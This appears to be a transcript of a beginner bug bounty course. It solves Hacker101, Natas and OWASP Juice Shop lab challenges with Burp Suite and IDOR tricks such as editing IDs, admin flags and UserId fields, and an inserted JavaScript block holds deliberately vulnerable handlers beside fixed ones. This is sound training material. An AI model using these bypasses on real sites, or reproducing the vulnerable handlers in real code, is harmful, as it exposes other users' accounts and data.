Okay, we are going to set up our HackerOne account. You can actually come into Google and type in Hacker101; this is going to be their capture the flag practice area, and you can click this. What will happen for you (I've already logged in) is that it will bring you to a login page. Once you reach the login page you will have to go and create your own account with HackerOne, and once you create your account with HackerOne you can navigate back to Google, type in Hacker101, click on the Hacker101 CTF, and it will bring you back to the login; you'll click the blue button, log in, and it will bring you to this page. If it doesn't bring you to this page, you have a navigation bar very similar to this one, and you will just click on CTF and then you will be at this page, but you're going to have to register in order to reach it. Then what I want you to do, as we begin working with actual vulnerable websites, is go ahead and click Go. This is going to be the very first challenge I have for you. Once it loads you're going to be brought to this page, and the way HackerOne has set up their training program is that you will have flags, which will be a bunch of random characters, and once you reach that flag you will know you have found the area of the website that you were not supposed to find, or that is supposed to be vulnerable. So with that, I want you to pause this video and see if, with what you've learned in the last lesson, you can figure out how to find the flag all on your own. So with that, pause the video and give that challenge a go.

Okay, if you got it, that is great; if not, I'm going to go ahead and reveal to you how to find this specific flag. Before you do, I would challenge you to go back and watch the previous video and just see the steps that I walk through, and then come back here and give it a try, because I am certain that with what we have covered you can find this flag on your own. So the way we find this very first flag is by coming in here, right clicking, and going to View Page Source. Then we can look at the page source and see what is in here: it has a background image, and here it is, background.png. Just a little bit ago I actually came in here to try this, and my guess was that this is going to be a file that we were not supposed to be able to access, so I copied this, came over, and pasted it at the end of our URL. We're going to paste it and then hit enter, and here is our flag. We're going to move on to the next video, and I'm going to help you get set up on what you're looking for, and then I'm going to turn you loose and see if you can find the next flag on your own.

Okay, we are ready for challenge number two. We are going to come into the first easy program we can enter; we're only going to find one of these four flags, and we'll come back later for the rest. We're going to go ahead and click Go and pull open this
vulnerable website, and I'm going to turn you loose once this loads, because everything that we have covered so far should give you everything you need to know to find the flag that we're looking for in this specific capture the flag. So with that, I want you to go ahead and click around in the website and see if you can find the flag. Go ahead and pause the video now and see if you can solve the first challenge.

I believe we've covered most everything you need to know to find this flag, and so the first thing that we would do is just start clicking around. You could maybe make a page and see what happens; we've got a page here, we're on page nine, so we can go back, we can edit this page, and we can see we can edit our page nine. You can go back, click on the markdown test and click the button; it doesn't really do anything. We can come in and view the page source and look around; there's not really a whole lot here for us. So we can go back, go to Home, go to Testing, and just as we continue to click around, a couple of things stand out to me in our URL: we have this page parameter. So let's just go into the page that we created; we can come in here and just go page one, page two, page three, not found. Well, we know there have to be at least nine because we have created page nine, so go to four, five, and then we hit the forbidden page. If you remember, in the example that I showed earlier we have seen a forbidden page before. Then we'll keep going, all the way up to page nine, and look at every single option we have, because we know that's how far we are, as we've created it. So we have all these, and then page nine should be the one we created. So what page was it that was forbidden? It was page five. How do we access this? We can go to View Page Source; it says we don't have permission and it is forbidden. Well, there is another way to view this page. If you remember from the example website that I made and showed earlier, you would know that we can try and get around this because we have the option to edit a page, and so if we know we can edit the page that we made, maybe we can edit the page that was forbidden. So we can come in here and put in five, and there it is, there's the flag. So I hope you found this; I think by now we've covered everything needed to find a flag like this in the URL.

I have a few more challenges for us to try; they're going to be on a website called OverTheWire, and I will help you navigate to that page and get logged in. We don't actually have to create a user, which is very nice, so it's very easy to access and to practice on. With that, I'll see you in the next video and we'll get that all set up.

Okay, we are ready for a few more challenges, so we're going to head over to a website called OverTheWire. You can click on it or type it in, and we're going to click on Natas; this is where we're going to be working out of. We can click on that and it will pull it open, and this is where we're going to get started. I'm going to open a new tab to keep this one open. We're going to start on level 0; the password is going to be natas0. So all we have to do is copy this URL and paste it in and hit enter, and our username is going to be natas0 and the password natas0, and then we'll hit enter. Every time you find a new flag you will come up here and change the 0 to a 1, the 1 to a 2, the 2 to a 3, and it will prompt you for a username and password. So we have natas0 right now; the next username will be natas1, and the flag that you find will be your password for the next level. We have gone over everything needed to find this first flag, and I want you to go ahead and try and do that now.

Okay, hopefully that went well for you and you were able to find the first flag, but before we get
into that and get going too far, there's one thing I forgot to mention in the recon portion of the course, something that we will use in Natas and that you will use later on in your bug bounty hunting career: the robots.txt file. The way we get to that is you just add a forward slash and then robots.txt and hit enter, and it will take you to a page; this one doesn't have one set up, but it'll take you to a page listing what the site doesn't allow search engines to find. Sometimes websites will have files that they are hosting online that they don't want Google displaying, so they'll have a Disallow or Allow for Google and Bing and Yahoo and other search engines that go through and crawl their website. The crawler will go through that robots.txt file, and it will say: do not allow Google or Bing or Yahoo to crawl through these files. So it's always a good thing to check the robots.txt, scroll through and see what's allowed and what's disallowed, and then visit those disallowed files, domains or directories that we find and see what's in there.

So with that, we'll go ahead and solve this challenge. I hope by now you know one of the first things we do is to go ahead and view the page source, or you can inspect the element; either one works. I like to view the page source because it gives us a more complete view. One thing I want to mention about the Natas levels is that everything inside this head tag, which will be from here to here, doesn't have anything to do with the level, and so sometimes you'll see the password for the previous level up here. The next one would be right here; this is our password for this challenge. So I hope you found this, and next time, if you view the page source, this password will be right here; just so you know, it's inside the head tag, so it's not actually anything that's going to be relevant to us. So here's the password for the next level. You can go ahead and copy this, and the way we get to the next level, if you remember, is to come up here, go to natas0 and change this to 1. It will prompt us for the username, which is going to be natas1, and then our password, which we just found in that flag, and we hit enter and that takes us to the next level. If you want to go ahead and try and solve this challenge, you can do that now. I'm going to stop this video and we will solve this challenge in the next lesson.

So this one says that we are not allowed to right click; it's been blocked. However, for me, if I use my keyboard to right click, if I hold down Control and hit the right click, then it works for me, and so my right click is available by using Control, and then I do the exact same thing: I go to View Page Source, and once in here you can look through the code, and they've got it commented out: "the password for natas2 is", and then here's our password. Now this may seem really easy, but you will actually find people who have put a username or a password or an API key in a comment in the code and have just forgotten to delete it. They'll put them in here while they're developing the site or while they're writing their code, because they need to remember their username, their passwords, and other sensitive information, and you will actually come across it just being hard-coded right onto the site, and so that's why we check the code. Sometimes you will really find something just like this, a username and a password. These seem very easy, but they're also very practical, and it's something you will come across pretty regularly.

All right, this is an update since I originally made this video and was saying that developers will accidentally push usernames and passwords: I was working on the back end of a web app and I accidentally pushed my database username and password to the public GitHub page. So when I say this happens, I mean it; I have done it. I'm sure almost every single developer at some point has
pushed something sensitive to GitHub, and it is something to watch out for. So there is my update. And I guess I shouldn't say "pretty regularly"; you will come across them, but most people will have already reported these. This is why it's important to be one of the first ones on a site: pick a specific target and make sure you keep up to date with what's coming out new on different domains and different subdomains as you continue to work through different programs in your bug bounty hunting.

So we'll go ahead and copy this password, come back to our main site, type in natas2, and we will type in natas2 as the username and paste our password. I'm going to not save this, and then here we are again. It says there's nothing on this page that should give us a clue. Everything we need to know to solve this challenge we have already covered previously; I think there's a little more to it that will require our critical thinking skills, but we have covered everything needed to solve this challenge. So I'm going to let you give this a go, and then we'll go over the solution.

Okay, how did that go? Hopefully you were able to solve this challenge. I'm actually going to show us a couple of different ways that we could solve it, just so that we have a more rounded understanding of how the URL works and how different files and different directories are included in domains. So with that, I think by now you probably know what we're going to do: we're going to right click, view the page source, and we see here's where it says there's nothing on this page. We can look through everything in the header, which doesn't matter and isn't relevant to us, and so all that's left is this image, and then we have a link. What we can do is copy this and paste it into our URL, so as we paste this we can hit enter and see where it takes us. When I first solved this I went and checked to see if I could inspect the element to see if there was anything else on this page other than this picture, or maybe there was something inside of it that would help us, and when I was looking here at the URL I noticed that this is a file, an image, and it's inside of a directory called files. Now, if you remember, we can actually go back directories: you can just delete the pixel.png and it will take you to the previous directory, and here it is. Or we can go back another way; just like we learned in our home folder in our Kali Linux terminal, you can put a slash and then ../ and hit enter, and that will take us back one directory. So we've already viewed the pixel, and now we're in the parent directory, and now we can see this users.txt, so we can click this and it'll take us into a new file, and here are usernames and passwords. You have alice, bob, charlie, and then here's natas3; this would be our username, and here is our password for the next challenge. We've seen all of this before: we have seen that we can find in our source code things that don't show up, hidden files or hidden images, so I hope that you would have copied this and pasted it, and we've also seen what's called directory traversal, going back or deleting and moving into different files and different directories. So I hope that you were able to solve this challenge.

Next we'll get set up with different ways to install OWASP Juice Shop. You can watch the next five minutes of the video and see which one you think looks easier; I personally think the TryHackMe OWASP Juice Shop room right here is the easiest way, but I'll show you how to download and install OWASP Juice Shop onto your local machine, and you can decide which way looks easiest for you and which one you would like to run. So I'm going to show both of those to you now. Now, since I
originally made these videos, OWASP Juice Shop has now been put on TryHackMe, and it's really simple to just go to TryHackMe, make an account with them, connect with their servers, and then open up a Juice Shop box. So you can either install it the way that I have already shown in the previous video, or you can come to TryHackMe. It is free to make an account and open up OWASP Juice Shop, and from there everything will be the same. You will just click Start Machine and it will open up a machine like this, and then once it gives you an IP address you can copy it to your clipboard, open up a new tab, and paste in the IP address, and it will open up Juice Shop for you. I'll let this load; I'm going to cut this and then I'll show you how to open it up, and everything will look just the same.

The way you're going to connect to the box is: come up to Access Machine, you're going to click OpenVPN, you can download right here and it will download your VPN for you. You'll come over here, you will cd into your Downloads, and then you will type in sudo openvpn and then whatever your VPN download name is, and you'll hit enter, enter in your password, and it will connect you. I'll go ahead and do this now.

Okay, I have connected to the VPN, and now we can copy this and, with our new tab, paste this in, and we will be brought to the Juice Shop web app. We will accept the cookies, nom nom, and then we are ready to start. So it's up to you which way you would like to install Juice Shop.

Okay, we are going to go ahead and install a vulnerable web app on our local machine. It's a great place to practice. It's put out by OWASP, which is going to be a great resource for you. Rather than just seeing me show you how to do something, or listening to me tell you about it, this is going to be a place where we actually go out and practice this. We're going to download it by going to sourceforge.net, and I'm going to have this linked for you in the resources, and you can go ahead and click on that
link, and hopefully I can get it to link directly to the downloads so you don't have to navigate through any of this. This is actually my second time trying to download it, because the first time I downloaded the wrong version, and I don't want that to happen to you. So hopefully that link will work for you, but if not, you can follow along and I'll show you how to get to the proper download. We type in juice and we click on Juice Shop; it was the second one in the search engine. We'll go ahead and click Files. We want 9.1.3, which is right here. We're going to be installing Node 12, and so we need to make sure that we get Node 12, and it's on Linux, which is way down here at the bottom. This is where I went wrong last time. So we have Juice Shop, Node 12, with Linux. This isn't the right file, that's not the file we want; this one right here is the one we want, we want the tgz. So we'll go ahead and click that. After you click this it might take a little bit for the download to take place, but you can go ahead and click it, your download will begin shortly, and then once it downloads we'll go ahead and save it and it will automatically save to our Downloads. So I'm going to go ahead and pause the video and I'll resume it once the download has popped up.

Okay, there's our download. We're going to go ahead and click Save File, and this is going to save it to our Downloads. We can go ahead and click OK. I'm going to go ahead and close out of SourceForge, because we no longer need that. Then we're going to navigate over to our terminal. I am in the home directory, so I'm going to go ahead and cd into our Downloads. I will ls, and then here's the file we just downloaded. We need to unzip it, so we're going to go ahead and type in tar and then -xvzf and then juice-shop. Yours isn't going to pop up like mine is, because I already typed this in once, and then I'll tab to autocomplete, and this will go ahead and extract all of the content for us, and
then once this is finished you will need to install Node.js and then npm. So we'll go ahead and type in sudo apt-get install, and first you'll go nodejs. I already installed it, so I'm not going to install it again, but you'd hit enter and it'll say are you sure you want to; you will put in y and then you'll hit enter, and it will go ahead and finish the download for you. It might take up to a minute because there's a lot of files, especially in npm. So second, you'll do sudo apt-get install npm. You will hit enter, you will enter your password for the first one, you won't have to enter it for the second one, and that will go ahead and run and install npm.

Then we're going to ls in our Downloads and we're going to change directories into Juice Shop, so we'll cd into our juice-shop folder. Every time you run OWASP Juice Shop, when you want to open it up and practice in this vulnerable web app, you will have to cd into your Downloads and cd into juice-shop, because when you spin up your server it is going to spin up whatever content is inside the directory that you're in. So now to start, we just type in npm start, and that will go ahead and spin up our server for us. It now says our server is listening on port 3000, and then we can come back to our search engine, and this is what we'll be typing in: localhost:3000. You'll type that into your browser, and this is now our vulnerable web app that we are going to be practicing on in the future lessons.

But before we get to practicing and seeing what we can manipulate and what vulnerabilities we can find, I want to walk us through a little bit of what we're going to be looking for, how to identify different vulnerabilities, and how we're going to use Burp to help us find them. You will notice that if you have Burp running and you turn your proxy on and you start clicking on things and you refresh the page, Burp is not intercepting anything. It is not working for
us. So we need to configure our traffic so that it goes through our proxy, and we're going to do that by going over here, opening a new tab, and typing in about:config and hitting enter. I will warn you to proceed with caution, because this will change how your browser functions. So you want to accept the risk and continue, and we are going to type in network.proxy, and this one right here, network.proxy.allow_hijacking_localhost: we'll click this and we need it to change to true. Then we can go ahead and close out of this tab, and now if we refresh our page you can see that our traffic is running through Burp and we are able to intercept the requests.

Okay, in the next few videos we're going to be going through a couple of different PowerPoints. The reason for this is I think it's really helpful for us to have some kind of foundation before we begin looking at examples. I think by the time we get through the PowerPoint you're going to be a little confused and probably still not know exactly what we're looking for or what's going on, but my hope is that with the PowerPoints and then just a couple of examples you'll be able to start finding some of these bugs on your own. We're going to be practicing on Hacker101 as well as Juice Shop, which we just downloaded, and we're going to be looking at how to use Burp before we begin trying to exploit some of these vulnerabilities. I think that you will be using Burp a lot, and so it'll be helpful to go through and kind of look at how it works and explore just a couple of its functionalities before we begin our exploitation of some of these vulnerabilities. So we're going to be looking at IDORs, business logic errors, and we are also going to be looking at manipulating user input, and cookies and tokens as well, as we continue in this course.

So we're going to begin by looking at insecure direct object reference. These are called IDORs. That really doesn't tell us a whole lot, but they're really simple to understand once we get
going. These IDORs are going to be just parameters that we can change so that we can bypass specific functions on a web app. With IDORs or business logic errors you can bypass payment options, you can reverse payment options so that you're the one getting paid, you can put things into other people's carts. There's a lot of different ways you can use IDORs, and when you're out hunting on your own you're going to have to be creative, because there are many different ways that you can exploit IDORs. You can skip login pages, you can access someone else's account. Personally, one of the first bugs I ever found was being able to write on someone else's social media platforms. It was actually just one platform, and there was just one specific area of the web app where I was able to change an ID and write on someone else's wall of their news feed, and so that is an example of an IDOR. You can also leave feedback on someone else, under someone else's name; you can edit another person's blog or their post. So these are just examples of IDORs and different ways that you are going to be able to find them. IDORs and business logic errors are going to be the most common bugs out there, which is a great thing, because it makes it easier for us to find them, and they are easy to find as well. So these are something I think we should learn very well, and we are going to have a significant amount of time to practice these, because there's actually a lot of different areas and ways to practice these, especially in Juice Shop, which we just downloaded.

The best way to test for these, and I think the only way, is by creating two different accounts. It is always good to create two different accounts, because you will have to test in real life against your own accounts. You cannot test on someone else's account, so you can't actually write on someone else's wall; this would be out of scope. Or you can't leave feedback as a different user; these will always be out
of scope. You don't want to ever mess with the functionality of the application or the people who use it; you will only use your own accounts to test against. It also makes it easier to use your own account, because you already have a second ID number that you can use on your attacker account. So you'll have an attacker account and a victim account that you will use, and you don't want to test on someone else's account.

A simple example to remember is to look for hidden inputs. You will actually see this as well in Burp: when you create an account it won't say input type hidden, but you will see, such as a name and your username, and it will say are you an admin, and then it'll say value no. An easy way to show one of these errors is just to change this value to yes or true, and you will automatically have admin privileges. We're actually going to be able to test this out in Juice Shop, something just like this, so you'll get to see this in action. So we're always looking for parameters and things that we can change to get us somewhere that we should not be.

One of the other places that you will find IDORs is in cookies. A lot of times cookies and tokens will host user information; that's how websites will keep you authenticated. Not all of them, but some of them will be through cookies, and so inside cookies maybe you'll see something in your cookie like user ID and then a number, and you can change the number to something else to see if you can access that account. For example, if you had two accounts, you'd take the user ID of your victim account and you would replace it on your attacker account and see if you can access parts of that application that you shouldn't under another user. If you were getting malicious with this, you would change the value to 0 or 1 and see if you could gain admin privileges to the web app. Another way to test for this is to see if you can log in, save your cookies first, or your tokens, and then log out, and then see if
you can log in and delete your previous cookies or tokens and then repaste in your new ones and see if they have been terminated or ended. If they haven't, this would be a logic error, because when the session has ended so should the cookies or tokens. So you can see what to manipulate and where you can manipulate different things within cookies and tokens as well. These aren't specifically IDORs, but they're similar, similar enough that I think they can be included together.

When we're testing we're going to be using Burp; this is going to be where we're at the most. Sometimes you will be able to see these in a URL. For example, if we have this example here, www.website.com, and let's say you have an invoice, you just purchased something and it says your invoice number is 12 in the URL, you can just change this 12 to an 11 and see if you can access another customer's invoice. If you could, this would be a sensitive information disclosure; it's something you shouldn't be able to access, and that would be a simple IDOR. I think they're easier to test for in Burp because it's all laid out for us, as we'll see in the coming videos. Another example would be where you can upload images or resumes, like on Indeed. You can upload a resume, and you can see in the URL if you pull your resume. So let's pretend this is Indeed, and it says www.indeed.com and then it's got a slash and it says resume=87, and that's your resume. You could change this and see if you could access someone else's image or resume, just like you would have with the invoice, and see what you can access. But remember, out in the wild we are testing our own accounts.

So I actually have an example here for us that I pulled off of HackerOne, of an IDOR that somebody actually found, and we'll walk through exactly how he pulled this off. He goes to the website, and remember creating two accounts: he has a victim, logs in as the victim, he creates a blog on the site, he saves it,
and then what he ends up doing is going into the victim account, or the attacker account, and he does the same thing: makes the blog, and then from there he clicks the save button and then goes to edit user profile and saves it, opens up Burp, and then what happens is he can change the ID to the victim's ID. This would be a clear IDOR, accessing something that you shouldn't be able to, and we've seen things similar to this with the URLs earlier, in changing URLs. Then he forwards the request to go to the victim's account and the website information, and you can see that it has changed. So this is an example of an IDOR. I think we'll be able to make this sound a whole lot easier once we're actually walking through them. So I want to go and talk a little bit more about cookies and the URL and what exactly we can do with them, then we're going to look at how to use Burp to find IDORs, and then I want to turn you loose and let you try and find an IDOR on your own.

In this video we're going to talk a little more about URLs and what we can do with them, cookies and tokens, and then we're going to look at something called CyberChef, and then we'll move into Burp and exactly how it is going to help us and its functionality. But before we get there, I was talking with my wife and I just said, hey, I think I'm going to have to warn that my PowerPoints are going to be full of errors, because I actually made them just as bullet points for myself, and I was going to keep them on my second monitor, and then I realized I didn't have anything to show you, and I wasn't just going to have a blank screen. So if you're wondering how somebody with a PhD can have such poor quality PowerPoints: they were originally just my notes, and so I decided, rather than sit here and comb through them and go back over them, I will just show you. This is basically what my notes look like when I take notes, and I'll walk you through them, just so we can have a better understanding
of a few more exploits before we move into Burp. So first, changing passwords. You will actually come across this in Juice Shop when we are practicing, and more as we get further into the course. Sometimes you will see a URL that looks similar to this, or in Burp it will pop up at the bottom of a POST request, and we will have something similar to this, like a change password: you will have the username, and then the new password will be stored right here. In something like this you could actually grab someone else's username and, on your victim account, try and change the password to it and see if you're able to pull that off. Or you can go ahead and see if you can maybe delete your victim account by, instead of having change password, you'd have delete account, or delete user, or just delete, and then you can put the username here, and you would obviously not have the password. You'll also be able to use DELETE instead of PUT or POST (you'll have PUT, POST, DELETE options) and you can try and delete the account through Burp. Even if you aren't able to pull any of that off, if you have a URL that has a username and a password in it, even if it is encoded with something as simple as Base64, this would be an information disclosure, and we'll get to why this would be an information disclosure in just a few slides.

We talked about this a little bit in the last PowerPoint, in the last video. If you have a website, something similar to this, which I actually just copied out of the OWASP guide, the OWASP pen testing guide, as well as another image that we're going to come to here in a second: sometimes you'll come to something like this if you are logged out and you copy and paste in a URL that requires you to be authenticated, and it says authenticated no, and it does not allow you to view the site. You can just change this authentication here to yes or true and see if you are able to access the site and see what you can gain access to. Then we can check the log
out functionality, and this is why it is an information disclosure if you have a username and a password in the URL: because it is possible for you to log out on your computer and then close the browser, and you'll be able to open up the browser and it has cached the previous page that you were on, and you can go back into the history and open that page. If it opens, even if you're not able to go to any other links because you're not authenticated anymore, but if it opens that URL and your username and password is in there, it would be an information disclosure. Or if you log out and you don't close the browser, it's possible to hit the back arrow or the back button and go to the previous page and have the information there. This can also be more than just information disclosure: if you're able to hit the back button after you've logged out and then browse the site again and it re-authenticates you. This is something that's listed in the OWASP guide. It's something that happens; it's not very common, but it's something to check for. You might be thinking this isn't a very big deal, because that's what I originally thought.

Okay, we are going to, in this video, go through some of the functionality of Burp. So I'm going to go ahead and have you navigate over to Hacker101 and get into their CTF, and we're going to open up Postbook. You can go ahead and click Go and pull it open, and when you're there the first page you'll come to will look like this. So we'll go ahead and come over to Burp; you can turn your intercept on, and make sure that you are sending all of your traffic through your proxy by coming over here. We'll go to Preferences, scroll down to Settings, and make sure that you have manual proxy configuration, and then it looks like this. Once you have that done you can click OK, and your proxy should now be set up to intercept your traffic. Just to give it a test, you can refresh the page and make sure that it pulls through here, and you can
forward all of the requests we intercept, or you can just turn it back off and then turn it back on. But we are going to come in here and we are going to sign up. So we'll go ahead and click Sign Up, and you can just see what's going on in here: we have our signup.php, you can see it's pulling that from our URL, we have a GET request. We'll forward that and we'll come back over here, and this is where you're going to make your username. We can just type in test, and password can be test, and you can submit your query, and then in here you can see your username and your password. If you wanted to actually try and mess with this and see what we can do with it, we would send it to Repeater, so you just right click and click Send to Repeater, and over here we can send this request as many times as we would like to. So in here we can change the username to test1 and then send it, and we are getting a 302 in response. So let's go ahead and shut this off and see: we have successfully signed up, and I think we actually created the test1 account as well. Yep, so we have made the test account and the test1 account. While you're in Repeater over here, you can see that this would be not a very secure way of submitting these things. You will actually come across this pretty regularly, even on large, very common websites, and you can see what you can do here. You can try and manipulate things and see just what you can do, and maybe type a GET request and change to a different URL and see what response you get over here. There's lots of things you can do, and in Repeater you can send this as many times as you want to the server, and really just try to figure out if you can get anywhere that you shouldn't be with this.

So we're going to go ahead and come back to our proxy and turn it on. Now we are going to just create a post. We'll go hello world, create post. We have a user ID of 5, and remember, every time we see ID we should be thinking IDOR: what can we
change, where can we go, what can we get with this. We have the body of the message over here, we have a cookie over here. You could bring this over to CyberChef and see if maybe there's anything in there; if you remember, we just go Magic and then we would paste it in, and you can see we didn't get anything out of our cookie, and so that's okay. We would come back here, we can send this, and it says we get a redirect. You can follow the redirect and then come down here and see what your response is, and it says we need to sign in, so you have to be authenticated. The cookie is necessary, something that we have to have in order to continue on, for authentication purposes. But as you can see, this is kind of how I would just go about testing at the beginning: just see what I can do with this ID, what I can do with the verb, with the body, see where I can get, where I can go, see what responses come back. With that, I think I've given you a pretty good clue here with this user ID: there is an IDOR in Postbook. I'm going to give you the challenge now to open up Burp, come in, make an account, or two accounts, and see if you can find the IDOR.

Before we go ahead and solve this challenge, I want to introduce you to one more functionality inside Burp that is going to be helpful in the future as you're doing bug bounty hunting, and that is the Intruder. So right here, Intruder. One of the things we could do with Intruder is, as we come in here and we just refresh this page, we have this ID of 6. Let's say there are a thousand different numbers in here. What you can do is send this to Intruder and it will actually go through these numbers for us. So you can come over here and you can go to Positions, and we will clear this, and you'll highlight this number 6, and what it does is it will go through every number we specify in here and replace that number 6 and then give us back the response. So we can come over to our Payloads and we can go simple list, and then we will put in just
numbers. We'll do one through ten, so you just go 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, and now we have just a simple list and we have just the one position, and we're going to go ahead and run through these numbers. So what you do is you click Start Attack and go OK, and it will automatically replace that for us, and then we can click on these and see what we have in the response. You can come through and see if we have found anything in here. It says write a new post, my profile; it doesn't look like anything private. This is for my own eyes only, number 2, and we see the same thing, and this one actually has someone's actual content. Then you can go down to number 3, and you can see how this would make it easier, so you don't actually have to go through and do 1, 2, 3, 4 manually. You can, but you don't have to.

So what we would do if we wanted to get more malicious with this, as we're looking for an IDOR, is come back into our proxy here and you can turn it off, or you can use Burp. I'm going to use the URL just because it's what we're used to, but I would encourage you to actually try this with Burp. I'm going to show you how I would do it with the URL, and then you can actually come in here and see if you can run this exploit and find the flag with Burp and without using the URL. So what we do is the exact same thing: you can come in here and you can just go 1, and somebody posted this; it's not private, it's to the public. You can come here and you can type in 2, and this actually has the checkbox, yes, this is for my own eyes only, and so this would be something that is not supposed to be seen by everyone. So this would be considered an IDOR; if this was an actual program you could report this as an IDOR. Not only that, you can write inside someone else's entry here and then you can save the post, and in saving the post, I am not actually sure why there are two flags. Maybe one for writing on someone else's wall and
one for the IDOR; I'm actually not entirely sure. But you can see the author was also an admin, so we made it beyond just a regular user and into an admin. So this is how IDORs work.

We're going to be moving from Postbook into Juice Shop, and the way I want to work through the Juice Shop vulnerabilities is by giving you just little hints, maybe telling you what part of the application there is a vulnerability in, and then setting you free. After you have spent a significant amount of time and you're starting to get frustrated, or you want a clue, just continue watching the video and I'm going to work through some of these vulnerabilities step by step. But I want you to give it a shot and try and figure out where the vulnerability is and see if you can solve the challenges on your own, and only if you're really struggling come back and get another clue, and then pause the video again and see if you can figure out the rest of the challenge on your own, kind of like we have been doing. But from this point on it's going to be a lot more difficult for me to show you very specific vulnerabilities on multiple websites, because at this point Juice Shop is going to be our main place of working; there's not a whole lot of options when it comes to practicing specific vulnerabilities and then me showing them to you. So I want to give you clues of where they might be located in the application, and then set you free to try and exploit them, and then only when necessary help you with another clue too.
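The Postbook IDOR walked through above (a post fetched by whatever id the client puts in the URL, swept with Intruder over ids 1 to 10) and the feedback forgery in Juice Shop that follows are the same defect seen from the server side: the handler trusts an identifier the client controls instead of the session. Here is an added example, not code from the video, Postbook or Juice Shop, showing the vulnerable handler beside the hardened one for both cases, plus a check that spots an id sweep in an access log; the users, posts and log lines are constructed for the example, and the ids 5, 6 and 14 only echo the ones mentioned in the video.

```javascript
// Added example (not the video's, Postbook's or Juice Shop's code): the IDOR
// pattern seen in Postbook and in Juice Shop's feedback form, as a vulnerable
// handler beside a hardened one, plus a log check that spots an Intruder-style
// id sweep. All data below is constructed for the example.

// Constructed users and posts. Post 2 is the admin's "for my own eyes only" post.
const users = new Map([
  [1, { id: 1, name: "admin", isAdmin: true }],
  [5, { id: 5, name: "test", isAdmin: false }],
  [6, { id: 6, name: "test1", isAdmin: false }],
]);
const posts = new Map([
  [1, { id: 1, authorId: 1, isPrivate: false, body: "public post" }],
  [2, { id: 2, authorId: 1, isPrivate: true, body: "for my own eyes only" }],
  [3, { id: 3, authorId: 5, isPrivate: true, body: "test's private post" }],
]);
const feedback = [];

// The session is what the server established at login; nothing in it comes
// from the request body, the query string or a client-editable cookie.
function sessionFor(userId) {
  if (!users.has(userId)) throw new Error("unknown user");
  return { userId };
}

// VULNERABLE: fetches whatever id the client put in the URL and returns it.
// Any logged-in user who asks for id=2 receives the admin's private post.
function getPostVulnerable(session, postId) {
  const post = posts.get(Number(postId));
  return post ? { status: 200, post } : { status: 404 };
}

// HARDENED: the authorization decision is made per object on the server,
// from the session. A private post is only returned to its author, and a
// denied object answers 404 rather than 403 so the response does not confirm
// that the id exists (which is what makes an id sweep informative).
function getPostSecure(session, postId) {
  const post = posts.get(Number(postId));
  if (!post) return { status: 404 };
  if (post.isPrivate && post.authorId !== session.userId) return { status: 404 };
  return { status: 200, post };
}

// VULNERABLE: trusts the UserId field of the submitted body, so changing it
// to 14 files the feedback as user 14 (Juice Shop's "forge feedback").
function createFeedbackVulnerable(session, body) {
  const entry = { userId: Number(body.UserId), comment: String(body.comment) };
  feedback.push(entry);
  return { status: 201, entry };
}

// HARDENED: the author is the authenticated user; a client-supplied UserId
// is simply ignored. The same applies to hidden fields such as an isAdmin flag.
function createFeedbackSecure(session, body) {
  const entry = { userId: session.userId, comment: String(body.comment) };
  feedback.push(entry);
  return { status: 201, entry };
}

// Detection: an Intruder run over ids 1..10 shows up in the access log as one
// client walking consecutive ids on one path. Returns every client/path pair
// whose longest run of consecutive ids reaches the threshold.
function findIdSweeps(logLines, threshold = 5) {
  const seen = new Map(); // "ip path" -> Set of ids requested
  for (const line of logLines) {
    const m = /^(\S+) - "GET (\/[^?\s]*)\?id=(\d+)/.exec(line);
    if (!m) continue;
    const key = `${m[1]} ${m[2]}`;
    if (!seen.has(key)) seen.set(key, new Set());
    seen.get(key).add(Number(m[3]));
  }
  const hits = [];
  for (const [client, ids] of seen) {
    const sorted = [...ids].sort((a, b) => a - b);
    let run = 1;
    let best = 1;
    for (let i = 1; i < sorted.length; i++) {
      run = sorted[i] === sorted[i - 1] + 1 ? run + 1 : 1;
      if (run > best) best = run;
    }
    if (best >= threshold) hits.push({ client, consecutiveIds: best });
  }
  return hits;
}

// Constructed access log: one client sweeps ids 1..10, another views two posts.
const SAMPLE_LOG = [
  ...Array.from({ length: 10 }, (_, i) =>
    `203.0.113.7 - "GET /index.php?id=${i + 1} HTTP/1.1" 200`),
  '198.51.100.9 - "GET /index.php?id=5 HTTP/1.1" 200',
  '198.51.100.9 - "GET /index.php?id=7 HTTP/1.1" 200',
  '198.51.100.9 - "GET /sign.php HTTP/1.1" 200',
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(getPostVulnerable(sessionFor(6), 2).status, getPostSecure(sessionFor(6), 2).status);
  console.log(findIdSweeps(SAMPLE_LOG));
}
```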
and so with that you can actually continue playing around in post book and see just what else you can do in finding idors okay we are ready to find our first eye door on our vulnerable web application so you can come in here and try and find it on your own or I can give you a tip on how to get started if you want to try it completely on your own you can go ahead and pause the video now browse the application intercept your traffic with burp and see if you can find the idor your first tip is going to be will find the eye door in leaving customer feedback under someone else's user so you can go ahead and try and find that now if you want or keep playing the video for the next tip okay the next tip is going to be creating an account you will I already created one I figured you didn't want to sit through me create an account so you can actually just come up here click on the account setting the account tab go to login create a login and once you're logged in try and find how you can leave feedback as someone else we are going to go ahead and solve this challenge if at any time you feel like we have gone far enough and you have enough Clues you can pause the video and try and solve it on your own from that point forward but we're going to come over here to this menu we are going to click customer feedback now I want to give you another helpful tip if math is not your strong suit you can actually open up and inspect the element you can come to network and then you can refresh this I'm going to enter Network we will get a whole bunch of get requests and we will look through and find the one since this is called captcha we're going to find the one that is labeled with captcha and in there it will have for us the answer and you see this request we are going to look at the scoreboard at the end of this video and I'll kind of talk through what this is but we're going to go to this as soon as we solve this idor but as we continue scrolling through and we're looking for the 
capture right here you can go to the response our answer is going to be 11. so it will solve for you whatever math problem you have and that's the easiest way to get through these and so our answer is going to be 11. it has our user name we can leave a comment I like to just sleep hello world we would give it a rating and then make sure to intercept when you submit this and so we'll hit submit and now we have our user ID if you want you can go ahead and pause the video and see if you can figure out what to do from here what we will do is we're going to send this to the repeater we can come up here open it up we can send this request to make sure it goes through it says it was created so we have successfully left feedback but we want to leave feedback as someone else and so what we do is we can change our ID to let's just go 14. just pick an arbitrary number that's less than the one we were using or the one we were assigned and then we can send it and it says it was created so now we should be able to turn off our proxy intercept come back to our web application and it tells us we successfully solved the challenge of forging feedback so this is an example of an idore where we are leaving feedback under some other user's name and now I want to go to the scoreboard real quick this is where you can see the challenges and you can see all of the challenges that are available on this web application all right um I was playing around with the comment section in the products and I realized you can actually leave feedback as someone else other than coming over here to our customer feedback you can actually lead feedback from a different user right here on these products and maybe you actually figured that 